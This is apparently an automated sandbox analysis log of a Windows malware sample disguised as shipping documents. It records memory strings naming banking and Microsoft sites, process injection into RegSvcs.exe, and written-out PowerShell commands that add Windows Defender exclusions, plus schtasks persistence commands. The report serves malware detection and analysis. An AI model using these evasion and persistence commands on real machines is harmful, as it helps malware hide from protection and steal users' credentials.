Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598218	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597312	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597203	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596983	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596746	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596497	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596387	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595932	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595437	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595328	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594671	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 593878	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599871
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599656
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598313
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598095
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597972
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597844
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597580
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597344
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596906
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596797
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596687
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596578
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596469
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596359
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596141
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595781
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595672
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595562
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595453
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595339
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595234
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595125
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594957
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594815
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594688
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594529
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594422
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594176
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594047

Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 00000009.00000002.3918717496.0000000001116000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.3918857090.0000000001538000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: tdcorV.exe, 0000000A.00000002.1525703407.0000000000C42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004154000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: tdcorV.exe, 0000000A.00000002.1525703407.0000000000C42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\H-
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: RegSvcs.exe, 0000000E.00000002.3927879096.0000000004473000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 14_2_06C99548 LdrInitializeThunk,

14_2_06C99548

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DBD008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 444000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 446000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 1093008	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShippingDocuments240384.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tdcorV.exe"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp1FC2.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tdcorV" /XML "C:\Users\user\AppData\Local\Temp\tmp329E.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\tdcorV.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior

Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Users\user\Desktop\rShippingDocuments240384.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\rShippingDocuments240384.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
